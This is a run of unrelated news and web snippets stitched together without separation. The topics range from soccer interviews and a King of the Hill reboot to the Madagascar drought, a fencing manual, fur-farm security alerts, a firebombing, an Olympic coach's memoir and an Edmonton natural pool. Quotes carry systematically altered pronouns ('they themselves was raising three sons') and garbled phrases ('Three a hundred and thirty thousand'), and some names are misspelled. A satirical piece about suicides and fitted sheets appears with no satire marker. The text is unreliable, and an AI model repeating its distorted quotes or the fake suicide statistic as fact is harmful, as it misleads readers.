DK : We did n't think that Innocent [ Emeghara ] was n't going to play the entire year . And they did come in injured , and they kind of fell out of favor -- let 's be honest . Quincy [ Amarikwa ] getting hurt when they did do n't help . Marc Pelosi sitting out the entire year -- he 's not a huge offensive threat , but he 's a good soccer player , and they get you in and around the goal a little bit more . All those things .
You know what really hurt us last year was our ability to be dangerous on set pieces , and I think that 's where Clarence kind of hurt us , being out for so long . Because at times if the service is n't great , you need to turn an average ball into a really good ball , and I do n't think we had the capability to do that last year .
Paul Tenorio Honeymoon can wait : Dax McCarty ready to tackle new USMNT future
Chris missed a lot of games , when you think about it , and I think they got 12 goals last year , if I 'm not mistaken . They could possibly have had more . We want to put ourselves in a position to give them chances to get more . Their movement in the box is just ... you ca n't put your finger on it , he 's just very good , and when they get chances , they rarely miss the target , and that 's a story for their success .
And with Simon [ Dawkins ] , we 're looking at Simon after a year under their belt to be little more of an influential piece inside and outside the locker room . Just on everything .
FFT : The Quakes have n't been to the playoffs since 2012 . You 've got to feel considerable pressure to make this season .
DK : Yes . Why not ? You know ? If you do n't have pressure to make the playoffs , then you 're just walking through the season , just trying to go through the emotions . I think you know me well enough [ to know ] that every loss hurts . Whether it 's the first game of the season or the 33rd . I am prouder of this club and attached to this club than most people are , and I want success for this club .
More features from FourFourTwo USA
Scott French is a reporter for FourFourTwo . Follow them on Twitter @ ScottJFrench .
Story highlights Fox had a conversation with the show 's executive producers about staging a reboot for the animated series
The news comes at a time when reboots and revivals continue to be attractive pursuits for networks
( CNN ) The TV reboot train keeps chugging ahead .
This time , it 's Fox that 's exploring the possibility of bringing back one of its classic animated shows -- `` King of the Hill . ''
Fox Television Group chairperson Dana Walden told a group of reporters on Tuesday that the company has had a conversation with executive producers Mike Judge and Greg Daniels about staging a possible return for the comedy .
`` We had a very preliminary conversation , '' they said . `` Given what 's going on in the country , I think they had a point of view about how those characters would respond . But , again , it was one meeting and I hope to revisit it . ''
The meeting , Walden said , took place more than two months ago and was simply `` exploratory . ''
Read More
Architect Shigeru Bahn , best known for their innovative and surprisingly resilient cardboard structures , recently won the Pritzker Prize , their profession 's highest and increasingly controversial award . Bahn 's low-cost paper buildings demonstrate the possibilities of an ostensibly mundane material usually reserved for cheap boxes , toilet paper rolls and breakdancing surfaces .
Related Content Take a Tour of Pritzker Winner Shigeru Ban 's Paper Tube Structures
Last year , two artists pushed the limits of cardboard beyond buildings to create cardboard cities . The catch ? They 're built at half scale . Inspired by the cardboard forts they built with their children , photographer Andy Rudak came up with the concept for the project and commissioned professional model-maker/set-builder/prop-maker Luke aan de Wiel to design and build cardboard street scenes . From the brick-paved streets and historic buildings of Paris to the haphazard slums of Mumbai , these beautifully detailed models use common cardboard as a proxy for stone , brick , plaster , metal , wood , and plastic , illustrating a mastery of the material that would make any architect or model-maker jealous .
The lighting and composition of the photos , not to mention the surreal presence of a single animal , gives the impression that these are n't isolated set pieces , but snapshots taken in some familiar but yet completely alien places . Dreams . `` I knew I wanted the shots to portray a scene of serenity and create an almost dreamlike scenario . No movement , merely a feeling of calm stillness .... without the people there the city falls silent , its just you , the buildings and the animal , '' says Rudak . `` The fact that the animal did n't really belong in the habitat was to aid the feeling of being in a dream . ''
The designs are n't based on photographs or any specific place , but are imagined scenes created after rigorous research to determine the unique architectural elements of each city that would , as aan de Wile says , `` elicit an immediate recognition of the place . '' Rudak is more straightforward in their analysis : `` The scenes are based on cliché , rather than fact . ''
The project raises an interesting question , one that set designers face on a daily basis . How do you distill a city ? What makes Paris Paris ? Are cities recognized only by clichés of built form or by something more ? By some larger , ineffable idea of place imbued by history ? Whatever the metric , it 's obvious which city each model represents - even without the captions . And somtimes the fiction bears an uncanny resemblance to reality . `` On a later visit to Japan , '' says aan de Wile , `` I stumbled upon a street in downtown Tokyo that had two buildings next to each other that were virtually the same as the ones I had come up with a year earlier . [ It was ] a very spooky experience . ''
Each set took about three weeks to make . Other than a simple wood armature , everything is cardboard . Crisp new sheets of the material were painstakingly aged to give the street scenes a `` lived in '' feel . It 's almost like how architects and builders specializing in historic preservation and restoration will use acid to artificially age their additions or interventions , making them appear a part of the original structure . The aging was key to making these models look real , but the surreal photographs play a huge role in that too . It feels like the cities extend beyond the edges of the photos .
For Rudak , the important thing was `` how the buildings react to the light around them . Even the most humble wooden hut , '' they say , `` can look incredible when the light hits it just right . '' That holds true for cardboard townhouses as well .
Joji ( real name George Miller ) is best known for their web series Filthy Frank TV and their gross-out musical alter-ego Pink Guy , but he 's looking to make an impact with more serious music , too . They recently released the track “ I Do n't Wan na Waste My Time , ” and it 's a far cry from their YouTube comedy roots . As Joji explains to Genius , the self-produced song addresses moral dilemmas in a relationship , particularly around the issue of cheating .
“ My friend was talking to me , ” Joji tells Genius . “ He was about to cheat on their girl and I was like , ‘ I do n't know . You can do it if you want . Why are you talking to me ? ' And then I thought about that a little more . It 's not about him , but it was inspired by that… Males in general are very impatient . Including myself . That 's the mindset of a lot of males , in any scenario when they 're talking to a girl . They 'll say anything they want to get a nut going . ”
Joji sat down with Genius for the latest episode of Verified , breaking down their latest track . Watch them go line-for-line with “ I Do n't Wan na Waste My Time ” in the video above , and then check out past episodes below .
Apps are seemingly ubiquitous even though creating an app is hardly cheap , unless you are able to do app development under your own steam . Apps are still for developers or for brands . The emerging generation of programmers seem highly adept at creating them : Harry Moran , a 12 year old developer from Cork , Ireland became the youngest app developer in the App Store in November with their Pizza app , Pizzabot . Cost - Harry 's time and ingenuity . But if you are old generation , or a brand , the chances are the world of apps is as impenetrable as creating websites was before blogging came along or before Facebook made it a breeze . Apps expert Mippin aims to make apps ' creation as painless as Tweeting , as rich as Facebook and as personal as blogs .
What will the world of content look like when apps become as easy to create as setting up on an account on Twitter or posting to a wall ?
Mippin is a London-based spin-off from Deutsche Telekom , previously part of its T Mobile research division . To date the company has supported Apps creation for Nokia and a handful of other large companies like Vodafone and Samsung .
They have published over 60,000 apps , CEO Nick Barnett and creative director David Mannl tell me .
I walked through their Apps Fover the weekend to create an app of my Elastic Enterprise book and sure enough it was complete in 10 minutes . I have to pay a $ 20 fee if I want to push it out on my website . I 'm not going to do that because I think book apps need more creative production than the Apps Factory currently offers but to all intents and purposes I could already be an apps publisher . And the cost was about as minimal as it gets .
Mannl explains that apps are both content based and code based - the world of gaming apps involves original creative design and code but most content apps are really a window or an access point to content held elsewhere , usually on the web .
We 're sitting in the Frontline Club in London discussing the potential for apps if production costs were reduced to near zero .
`` Imagine if you were the owners of this restaurant , '' says Mannl . `` You want an app because people will be finding out about you through their smartphones . Your app could carry a video of the interior , the menu , recipes , events , a booking form , a warm welcome . In fact every restaurant would benefit from an app . ''
We also talk about highly personalised travel apps - railway timetables sliced and diced for people who take particular routes . Instead of a large train timetable why not create a thousand micro-timetables . Airlines could create micro-sites of particular routes too and provide a higher degree of personalisation for passengers who are regulars on those routes . Why not every author , every blog ?
The current barrier to apps - and let 's face it barrier is a relative term as apps are already innumerable - is the production cost . Mippin is creating a series of vertical templates so that the production cost comes down to zero and the app publishing is charged at a monthly SaaS rate .
With creating an app down at a $ 12 per month charge in place of $ 30,000 enterprises can begin to look at the app as a universal connector , a low-cost ubiquitous way to target information and the social graph in the sub-sets that employees need . The app could be the new alphabet .
Follow me on Twitter @ haydn1701
Food and Agriculture Organisation says 330,000 people are on verge of ‘ a food security catastrophe ' following sustained drought that has decimated crops
The severe drought afflicting southern Madagascar has left 330,000 people on the brink of famine , a senior UN official has warned .
Three successive years of failed rains have left the island nation wrestling with crop failure and a chronic lack of food and clean drinking water , with agencies warning last month that nearly 850,000 people are experiencing “ alarming ” hunger levels .
“ Three a hundred and thirty thousand are on the verge of a food security catastrophe , next step being famine , ” said Dominique Burgeon , director of emergencies and rehabilitation at the UN 's Food and Agriculture Organisation ( FAO ) .
Madagascar drought : catastrophe looms as 850,000 go hungry , says UN Read more
“ People go from one lean season to the next , resorting to negative coping strategies . People are eating anything to fill their stomachs , selling most of their belongings , cattle and land . It shows the severity of the situation and the need for us to act . ”
Farmers talk of the earth changing ; of failed rains and crops , and barren land . Meanwhile , agencies are fighting a desperate rearguard action . Unicef , the UN children 's agency , reports growing demand for the high-calorie , peanut-based paste used to combat severe acute malnutrition .
“ People are living under extreme conditions . We are dealing with a development crisis that has lasted for decades now , worsened by El Niño . For many , it is day-to-day survival , ” said Elke Wisch , country representative for Unicef Madagascar .
Wisch emphasised the need to build resilience in the disaster-prone country , where food production has all but ground to a halt as the El Niño weather phenomenon exacerbates the effects of the drought . “ We know that natural disasters will occur , ” they said . “ The important thing is how the local population can respond to these shocks . ”
Yet mounting any kind of response is complicated by huge funding shortfalls . The World Food Programme 's ( WFP ) operations across seven countries in southern Africa are only 50 % funded between now and April , with the total deficit at roughly $ 300m . The organisation 's $ 82m drought relief operation in Madagascar , which runs until March 2017 , faces a $ 50m shortfall .
Facebook Twitter Pinterest Ertharin Cousin , executive director of the World Food Programme , with a child in southern Madagascar . Photograph : David Orr/WFP
The FAO is also struggling , with a $ 17.5m shortfall limiting the distribution of emergency packages to 75,000 of the the 175,000 farming households in need .
Appealing for further donations , both organisations have stressed the importance of the forthcoming planting season . “ If we miss planting season , the need for food assistance could go into March 2018 , ” warned Burgeon .
Either way , the situation is likely to get worse before it gets better . Poor infrastructure makes it difficult to get assistance to remote areas of the south , with journeys of more than 200km likely to take days by road .
Moreover , nutritional challenges are endemic , with more than 50 % of children suffering from stunted growth , a condition caused by malnutrition over the first 1,000 days of life . The issue costs the world 's sixth poorest country an estimated $ 740m a year , roughly 7 % of its GDP .
We 're starting to see people eating seeds instead of planting them . That is a desperate situation Elle Wisch , country representative , Unicef Madagascar
“ We have not even reached the peak yet , we are four to five months away from the next harvest , ” said David Orr , the WFP 's regional spokesperson .
Madagascar 's president , Hery Rajaonarimampianina , will be anxious to ensure that infrastructure issues in Antananarivo , the country 's gridlocked capital , do not impinge on the hosting of a summit for French language states this weekend . With hotel swimming pools being used for drying sheets and laundry , and the city 's river running lower than normal due to its use for bathing , washing and stone production , Antananarivo has not been untouched by the effects of the drought .
After the summit , Rajaonarimampianina will travel to the Paris headquarters of the UN Educational , Scientific and Cultural Organisation for a donor conference .
In the absence of more immediate support , however , farmers in the region reliant on rain-fed agriculture face a precarious existence . “ Worst case is another crop failure , ” said Wisch . “ Then you are looking at – and we 're starting to see this now – people eating seeds instead of planting them . That is a desperate situation . ”
Both Motorola and Apple have been duking it out for quite a while now regarding patent infringements , with each side claiming that the other allegedly infringed upon their patents . After one and a half years of battling each other , it looks like the ITC has ultimately ruled in Motorola 's favor by handing down a “ finding of no violation ” ruling and effectively ending the investigation .
For those unfamiliar with the case , back in 2010 , Apple filed an ITC complaint against Motorola in response to Motorola 's patent lawsuit against them . The patents Apple alleged Motorola infringed upon had to do with multitouch , but we guess the ITC has decided that Motorola did not infringe upon any of them . Naturally Apple will not be pleased about this ruling and they could dispute the ITC 's decision in the federal court , a move which Florian Mueller of FOSS Patents seems to think Apple will be making , especially since Apple has partially-won an ITC ruling against HTC in the past .
Filed in . Read more about Legal and Motorola .
Much as a denizen of the 21st century might turn to YouTube demonstrations or tailored smartphone apps in order to learn or hone certain skills , so the autodidact of the Medieval and Renaissance period would have turned to how-to-guides such as this fine example from early 15th-century Italy — Il Fior di Battaglia ( The Flower of Battle ) . From The Getty , where the one of the copies is held :
This manuscript by the greatest fencing-master of the late 1300s , Fiore Furlan dei Liberi da Premariacco , instructs the reader in the intricacies of combat . Lively illustrations of charging horses and armored knights accompany the text . Through words and pictures , the manuscript teaches a variety of fighting techniques including single combat on foot with sword , dagger , and ax , and also mounted combat in all its variations . Nicolò III d'Este , ruler of Ferrara , ordered at least three copies of this text , including this one . Nicolò 's interest in such a manual was quite natural , since fighting played an important role in the education of young nobleman , and they themselves was raising three sons .
As noted above there are a few different versions of this work , Wikipedia offering an impressively detailed account of each ( as well as of the life of Fiore Furlan dei Liberi da Premariacco ) . Here 's what it has to say about the code of gold crown and garter seen throughout .
The format of instruction is largely consistent across all copies of the treatise . Each section begins with a group of Masters ( or Teachers ) , figures in golden crowns who each demonstrate a particular guard for use with their weapon . These are followed by a master called “ Remedio ” ( remedy ) who demonstrates a defensive technique against some basic attack ( usually how to use one of the listed guards to defend ) , and then by their various Scholars ( or Students ) , figures wearing golden garters on their legs who demonstrate iterations and variations of this remedy . After the scholars there is typically a master called “ Contrario ” ( counter ) , wearing both crown and garter , who demonstrates how to counter the master 's remedy ( and those of their scholars ) , who is likewise sometimes followed by their own scholars in garters . In rare cases , a fourth type of master appears called “ Contra-Contrario ” ( counter-counter ) , who likewise wears the crown and garter and demonstrates how to defeat the master 's counter . Some sections feature multiple master remedies or master counters , while some have only one . There are also many cases in which an image in one manuscript will only feature a scholar 's garter where the corresponding image in another also includes a master 's crown . Depending on the instance , this may either be intentional or merely an error in the art .
Below are some selected highlights from the Getty 's 80+ page version , including the lovely final page . Appearing after the last section on mounted combat , we are shown two horses , in a closing moment of calm , tethered quietly to a tree .
More detailed information on Fiore Furlan dei Liberi 's work can be found here on this dedicated site , including an English translation of the text found in this Getty version .
The Getty Underlying Work : PD Worldwide | Digital Copy : No additional rights Download : Right click on image or see source for higher res versions
I ca n't believe this is real . Is this real ? It is , apparently , real . Did I mention I ca n't believe it ?
The famously political Earth Crisis — whose causes of choice include animal rights — have a new album called Salvation of Innocents coming out in March , and this is apparently considered bad , bad news for mink farmers .
According to Animal Liberation Front-line , there 's a mink farmer advocacy group called Fur Commission USA that routinely releases “ internal fur industry ‘ security alerts ' ” that “ are sent to fur farmers via email and fax every time there is a ‘ security ' related issue affecting US fur farms. ” Obviously , these documents are not intended for public consumption , but Animal Liberation Front-line has gotten their hands on thirty of these bulletins from the past however many years , and they are now posting them for all the world to see .
What does this have to do with Earth Crisis , you ask ? Well , a FCUSA security alert from 2009 included this tidbit :
“ Earth Crisis has released its To The Death album . ”
That 's right : the mere release of a new Earth Crisis album was considered a viable-enough threat to be included in a security alert for fur farmers . A fur alert that also included warnings of a convicted destroyer of fur farms who was spotted “ doing surveillance and filming farms ” ( presumably to plan their next attack ) and reports that “ suspicious people have approached [ fur ] farmers seeking work. ” So not to undermine art 's power to raise awareness or anything , but this would be a little like the government including Rage Against the Machine on a list of possible terrorist organizations . ( Actually , that does n't seem so far-fetched… but STILL . ) Forget your feelings about the cause for a moment — Earth Crisis had these folks so freaked out that they were bunched in with people who have ( at least in the eyes of the law as it stands ) committed actual crimes .
I mean… overreact much , dudes ?
You can read the entire leaked security alert , as well as other such alerts , here .
[ via Earth Crisis ' Twitter ]
BALTIMORE—According to a study published Monday in Psychological Bulletin , more than 83 percent of suicides take place when an individual is faced with the task of putting a fitted sheet onto a mattress . “ In the majority of these cases , people end their lives after trying in vain to get the short side of the sheet onto the long side of the bed , and at least one-third kill themselves after struggling with the final corner only to realize it is their own body weight preventing the sheet from stretching far enough , ” said Johns Hopkins University psychologist Dr. Khalil Mazarhi , adding that suicide victims are usually discovered in close proximity to fitted sheets that are either partially covering a mattress or balled up in a corner of the room . “ The tragic irony of this phenomenon is that a significant number of people will actually use the sheet to hang themselves. ” The study concludes with a recommendation that , for personal safety , fitted sheets only be handled when a second person is present .
Advertisement
The Uptown home of a local political operative was badly damaged Thursday in an early morning fire that appeared to have been ignited by the firebombing of the man 's vehicles .
Mario Zervigon helped eight people , including their wife and two children , escape the burning home at 1407 Constantinople St. , around 2:30 a.m. Zervigon is the campaign finance director for Public Service Commission candidate Forest Wright , who this week advanced to a Dec. 6 runoff against incumbent Eric Skrmetta .
A Ford Explorer parked on a rear driveway and a Honda Odyssey parked across the street , both belonging to Zervigon , already were engulfed in flames when the occupants of three apartments in the large divided home escaped . Three cats died in the blaze but two other pets were rescued .
Zervigon , who also just completed finance director work for the successful reelection campaign of Civil District Court Judge Bernadette D'Souza , said they were unaware of any threats and shocked by the incident .
`` I do n't know if anything is connected to anything I do , '' Zervigon said . `` But all I do is simple , basic fundraising and campaign work . ''
New Orleans City Councilwoman Susan Guidry , another Zervigon employer , surveyed the damage and left shaking them head .
`` This is shocking , '' Guidry said .
Stay with NOLA.com for more on this breaking story as details develop .
Cyrus Christie is poised to join Garry Monk 's Middlesbrough
Cyrus Christie has completed a move to Middlesbrough after the club agreed a deal to sign the 24-year-old defender from Derby for an undisclosed fee .
Christie joins Norwich City 's attacking midfielder Jonny Howson in arriving at Rockliffe Park , as new Boro manager Garry Monk completed a double transfer swoop on Friday with their first signings since taking over from Aitor Karanka last month .
Christie spent three years at Derby after joining from Coventry in July 2014 , featuring 107 times for the Rams and scoring two goals .
Cyrus Christie celebrates with teammates after scoring Derby 's second goal during a 3-1 win over Brentford
Eligible to represent the Republic of Ireland through their Dublin-born grandmother , Christie has made 10 international appearances , scoring their first goal for Martin O'Neill 's side during a 4-0 win over Gibraltar in September 2015 .
They were awarded Derby 's Young Player of the Year award in the 2015/16 season , as the team ended their campaign with a play-off finish .
Cyrus Christie has impressed Republic of Ireland manager Martin O'Neill
Christie was sidelined last November after breaking a bone in their foot during a win over Wolves but returned to action in January .
They will join up with Monk 's squad for the first time on Sunday to travel to Portugal for a warm-weather training camp .
Quote : Originally Posted by bozzykid Originally Posted by What issues are those ? I 've seen very few reports of those types of issues with the 3rd gen. Obviously , those things happens to a small portion of users on almost every Android phone .
my personal experience with an 8gb model was a hot skillet in just 3 minutes on wifi or lte network plus doing some search i found a lot of users reporting the same issue so its not a very small percent it is a known issue maybe some users dont report it or dont care about it but it really gets hot . maybe some batchs maybe the 8gb model who knows ! every phone have small issues some related to hardware some related to software thats why i asked if the upgrade fix this onebut a phone that turns in to a hot skillet its not safe to use .
I had never been to Rio de Janeiro before , or to Brazil . I 'd only been to South America twice . Once was in 2000 , when I coached Diana Taurasi in Argentina the summer before their first-year student year . Later , I went to Chile to see Breanna Stewart play in a tournament . So now , we 're in Rio 2016 and I 'm coaching both of them on the same team for the Olympics . It 's funny how things work out .
There 's been a lot of discussion about Brazil in the news lately , and most of it has been very negative . But none of what the media talk about regarding Brazil was evident during the three weeks we were in Rio . I 'm sure that stuff is there . But what we found was an incredible group of people who worked very , very hard to make the Games a success . We saw parts of the city that were absolutely beautiful . I think that 's like any major city ; if you want to , you can focus on the really negative parts of a city and those things are definitely there . But we really only saw the positive aspects of Rio during the entire time we were there .
As most people know by now , we stayed on a cruise ship in Rio 's harbor due to a lack of hotel rooms available for all of the athletes . There were positives and negatives to that setup . We try to eliminate as many distractions as possible for the entirety of the Games , so in that respect it was a great positive to be far away from the Village . It allowed our athletes time to recharge and rest away from the craziness . A similar tactic was taken for the 2012 Games in London ; we stayed in a hotel in the center of town . But that setup meant we could just get out of the hotel and walk where we needed to go , or take the subway , and everything we needed to do was relatively close by . In Rio , everything was very spread out so we had to get bused around everywhere , and as a result we did n't get a chance to see as much of the city as we would have liked .
During non-game days , though , we 'd have practice for an hour and do a lot of media , then see if we could sight-see or give the players time to rest . These people are professionals ; they know how to prepare mentally . We do n't have to babysit them . So on my few days off I tried to see other events ; I went to beach volleyball on Copacabana Beach , which was like going to a giant beach party , and I got to see Bubba Watson on the golf course . Other members of our group went to track and field and a few took trips to the Olympic Village to visit friends on other teams or in other sports .
On one of our early days off during the pool games we took the entire team to Christ the Redeemer . There 's this huge area at the base of the statue just jammed with people overlooking the city . I 'd venture to say that just about every language in the world was being spoken up there , at the same time , and people were lying down on these mats that you can use to look straight up at the statue and take pictures of the whole thing . And the view is one of the most amazing you 'll ever see .
The atmosphere of the Games themselves , as you can imagine , was one of immense excitement . Take the Final Four and multiply it by one thousand and you get a sense of what it was like . The Olympic Boulevard , where they had the NBA House and where a lot of sponsors have their setups — there was a giant mall that stretched a few miles , and music and restaurants . The first Saturday night , there were around 60,000 people walking up and down that boulevard . And this was n't even the Village — this was right near where we were staying !
The overall experience was much different than my previous two experiences at the Olympic Games . I was an assistant coach for the 2000 Sydney Games under Nell Fortner , and because I was an assistant , I did n't feel a lot of pressure to do a good job . But in London I felt a lot of self-inflicted stress . It was my second international coaching job after the FIBA World Championships in 2010 — as a result I really felt like I was still learning my way through it . But in Rio , it was a more relaxed state of mind . There was a comfortable feeling among all of us . The trust was higher . And I really wanted to make sure everyone got a fair shake — at one point during the Serbia game , someone suggested I put in Stewie because we needed to move some pieces around . I put them in , and sat down on the bench , and realized that every player for us on the floor was a former UConn player . I thought to myself , “ Oh boy , this better work out , or people are going to be mad at me ! ” Thankfully it worked out . But I think people do n't recognize that the USA committee did n't pick these players because of their connection to me . They were picked because of what they 've done after college , which I think is a really important distinction .
The Rio Olympics were incredibly special because you do n't know how many of these athletes will be back for another Olympics or how long they 'll go on after this . The veterans on this team — five players who have won upward of 17 gold medals between them at the Olympics — you do n't know who 's coming back . Tamika Catchings , of course , has announced she 's retiring , but the rest of them , who knows ? So it was very important to me to enjoy all of it and enjoy the time I had with everyone . You appreciate people like Lindsay Whalen and Sue Bird and Seimone Augustus . You get to see someone like Stewie or Elena Delle Donne or Brittney Griner win their first Olympic gold medal and see their emotions and tears . And even getting to see players like Kia Nurse play great for Team Canada . You ca n't put a value on that .
All of these things are above and beyond strategizing the best ways to , say , beat Serbia or something . All of that was secondary to enjoying this time with these people .
At the end of the Games in London I walked off the court thinking , “ I never want to do this again ” because of all the pressure I had put on myself and all of the pressure I felt to deliver the goods for Team USA . But when the buzzer went off at the end of the gold medal game in Rio… I want to feel like that at the end of every single season . Doug Bruno and I were standing in the middle of the court crying like babies , because you just do n't know if this is the last time you 'll be with all of these people , in this exact circumstance , so you really want to enjoy every single minute of it . And I think we did .
“ This is n't a pool . It 's a more natural swim environment , ” says Jesse Banford , director of facility infrastructure delivery for the City of Edmonton .
Banford points proudly at the construction site at Borden Park , when the construction team from Ellis Don is building a very 21st-century swimming hole — the first of its kind in Canada .
Instead of using chlorine or salt to purify the water , this golden pond — with a budget of $ 14.5 million — will use a combination of sand and granite filters , aquatic plants , plankton and UV light to keep the water safe for the public .
The area will feature both a shallow 150-square-metre wading pool for small children and a much larger pool — 42 metres long , 16.8 metres wide and two metres deep — for swimmers to splash and play .
The whole area will be surrounded by 1,100 cubic metres , or 1,643 metric tonnes , of sand , quarried in Thorhild , along with 11 species of native plants to create the impression of being at the beach .
The pool was supposed to be open last summer . But a massive redesign — necessitated by the need to bring down costs — delayed construction . Now , crews from Ellis Don are hard at work putting up the Rundlestone walls , installing the filtration system and ordering just the right sort of sand — not so light that it blows away , not so coarse that it 's unpleasant underfoot .
Banford says the city plans to do a “ soft open ” this August to iron out the kinks and then open in earnest for a full season next summer .
“ Because it 's not a standard pool , we need to go through a lot of learnings . ”
“ Natural pools ” like this have been common in Europe , especially Germany , for decades . But they 're new on this side of the Atlantic . The only project of this kind in North America is Webber pool , in Minneapolis . While it has won critical acclaim for its innovative design , it 's also had a series of operational problems . It opened two years late , and well over budget . ( Although even then , it cost roughly half of what we 're spending here . ) Last summer , its first full season in operation , it had to close multiple times because of elevated bacteria levels .
But Robb Heit , who 's managing the project for the city , says Edmonton has tried hard to learn from the Minneapolis experiment . They themselves went to swim in its natural pool last summer .
“ It was as cool and clear as the swimming in the Shuswap , ” says Heit .
Edmonton 's pool , which will be maintained at 24 to 25 C to reduce algae growth , will be similar , they say .
“ The water will be a little more turbid . You do n't get the crystal clear water you see in a chlorinated pool . ”
This wo n't be a pool where you can dive or swim lengths or take lessons . The cool temperature may discourage guests who prefer to laze in warmer water . Still , Banford believes the novelty , and the “ green ” pedigree , will attract visitors , especially on the hottest summer days .
“ We 're looking at it as more of a destination , ” says Banford . “ It 's just going to appeal to a certain demographic . Families are going to come to check out the only natural pool in Edmonton . ”
I hope he 's right . After all , we 're spending $ 14.5 million — about twice what the city spent on the newish Queen Elizabeth Pool — to build something this finicky to run . Something , too , which probably wo n't have the populist appeal of a conventional pool .
I worry about ducks and geese and what they leave behind . I worry about swimmer 's itch and mosquitoes . I worry the pool 's filtration systems wo n't be able to handle big crowds on hot days . I worry high bacterial counts may shut the pool periodically , as has happened in Minneapolis . I worry we may be building a big fancy slough in the middle of our city .
And yet , in a city that has four other conventional outdoor pools , in a city with precious few beaches , there is something beguiling in the vision of an urban “ lake ” experience we can all share , within walking distance of two LRT stations , a magnet destination to complement the Borden Park sculpture garden .
In 1924 , the city opened its first “ mixed pool ” in Borden Park , where men and women could swim together . Borden Park is where Edmonton takes risks . Now , we 'll see how this one pays off .
Related
psimons @ postmedia.com
twitter.com/Paulatics
www.facebook.com/PaulaSimons
Almost everyone with a smartphone or a computer has experimented with photo editing at some point , but this retouching master 's work is above and beyond any Instagram filter .
Max Asabin , a digital artist from Russia , layers multiple images on top of each other , and seamlessly melds them together to create one incredible visual . They do this by trimming the edges of each foreground photo , adding shadows and highlights , and adjusting the overall colour to make it look extra realistic . With this technique , they can easily transport anyone into one of their breathtaking scenes . `` Digital Art is , for several years now , my main job . '' Max told Bored Panda , though they have only ever worked freelance . He 's been working with Adobe Photoshop CS6 since 2007 , and is entirely self-taught .
Max has gained over 35 thousand followers on DeviantArt , where they frequently upload their work , since their latest piece - Sleepless - was posted on the website 's main Facebook page . `` Most of them left positive feedback , but there was also critique , both constructive and negative . '' They told us . `` But in any case , I am extremely pleased with such attention ! '' Max is available for commissioned work , so drop them a line if your old family photos need a supernatural twist .
More info : DeviantArt , VK , Twitter , Instagram , YouTube , Tumblr
HALIFAX – Within weeks of the start of the fall semester , a Dalhousie University sports team is at the center of a hazing investigation .
The university is suspending their men 's rugby club after allegations the team violated the school 's hazing policy . The formal complaint was filed by an employee of the university .
“ I can certainly say that we do not tolerate any behaviour that disrespects , that humiliates or that threatens anyone in the university community , ” said Brian Leadbetter , Dalhousie 's director of communications .
“ The hazing policy is a key mechanism to ensure that these behaviours – any type of behaviour – is not endorsed or supported by the university . ”
The policy states the university has 60 days to investigate the incident . During that time , the men 's rugby club will not be able to represent Dalhousie or wear the university 's colours and uniforms .
The incident follows last year 's high-profile hazing investigation of the Dalhousie women 's hockey team . The team ultimately forfeited their season because nearly every member was suspended .
“ When we talked about how this happened to the women 's hockey team last year , it was a huge thing . It was all over the news and it was all over Dalhousie , ” said fifth-year computer science student Alexis Stevenson .
“ Well , if we already knew this was an issue , why are sports teams continuing it ? ”
READ MORE : Dalhousie University women 's hockey team suspended over hazing
According to the university , all clubs and varsity sports teams were made aware of the hazing policy , which came into effect this year .
Leadbetter said club executives would have completed hazing-related training .
On campus , fellow student athletes said the rules were clear .
“ We were told that no hazing was to go on . We were n't allowed to do anything that was uncomfortable for the rookies and stuff like that , ” said Nick Tweel , a member of the university 's swimming team . “ So I do n't know why they decided to do it . ”
News of the suspension spread on Monday as the university celebrated Pink Day at its campuses . Students , faculty and staff — many dressed in pink — came together for an outdoor BBQ to promote respect and tolerance .
Student union president Ramz Aziz said the issue of hazing is part of the greater dialogue organizers of Pink Day hoped to achieve .
“ It ties into it absolutely , ” they said .
“ We do n't have a lot of information about [ the hazing investigation ] because it 's being handled by the university but it definitely again re-emphasizes the importance of days like this . It 's all about values at the end of the day and what kind of values do we want to share as a society . ”
Citizens United Releases 1,300 Pages Of Cheryl Mills-Heather Samuelson State Dept . Email Correspondence 09/28/2016 In light of today 's congressional testimony by FBI Director Comey , Citizen United is releasing over 1,300 pages of email correspondence between Cheryl Mills and Heather Samuelson during their tenures at the State Department .
The American people have a right to know about the activities of high level government officials who have since been given immunity deals by the FBI .
Mills was State Department Chief of Staff and Samuelson was the White House Liaison at State who went on to serve in the White House Counsel 's office .
Mills and Samuelson also sat in during Secretary Clinton 's interview with the FBI as part of their legal team .
These emails shed light on the activities of Mills and Samuelson at the State Department , which included appointments , ethics , vetting , etc .
Most of these emails are from late 2012 to early 2013 around the Clinton-Kerry transition at State .
Our legal team estimates that Citizens United will receive 650 pages of these emails per month until approximately January 2019 .
Links to the emails below .
Part 1 :
https : //www.scribd.com/document/325636992/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-1
Part 2 :
https : //www.scribd.com/document/325637477/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-2
Part 3 :
https : //www.scribd.com/document/325638839/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-3
Part 4 :
https : //www.scribd.com/document/325639702/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-4
Part 5 :
https : //www.scribd.com/document/325640535/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-5
Part 6 :
https : //www.scribd.com/document/325641413/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-6
Part 7 :
https : //www.scribd.com/document/325642321/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-7
Part 8 :
https : //www.scribd.com/document/325646748/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-8
Part 9 :
https : //www.scribd.com/document/325647102/Cheryl-Mills-Heather-Samuelson-Email-Correspondence-Part-9
DIY injuries on rise amid home renovation TV boom , Brisbane doctors say
Posted
Do-it-yourself enthusiasts or those who unwrap a power tool this Christmas are being warned to actually read the instructions they come with , amid a rise in nasty injuries .
Queensland hospitals are bracing themselves for a spate of festive season emergencies , whether it be from lifting a mower , trimming hedges or lopping trees .
The Princess Alexandra Hospital sees at least one power tool injury a day , and new research is underway to understand if the disasters are freak accidents , or , if there is room for improvements .
Gold Coast architect Andrew Armstrong is happy to be the DIY disaster pin-up-boy .
The 55-year-old was cutting a piece of hardwood in their home garage a year ago when the saw `` kicked '' .
They chopped off four fingers on their left hand .
`` I did not feel it to tell you the truth , '' they said .
`` I looked down and my fingers were gone .
`` It happened it a split second . ''
Despite eight hours of microsurgery to re-attach the digits , they turned gangrenous and were amputated .
Mr Armstrong hoped their story will help save someone else 's fingertips .
`` I think most people who are do-it-your-selfers , like me , you forget about the instructions that you bought five years ago , '' they said .
`` And every time you pull a tool out you really need to understand how to use it again . ''
Accident ... or not ? Study underway
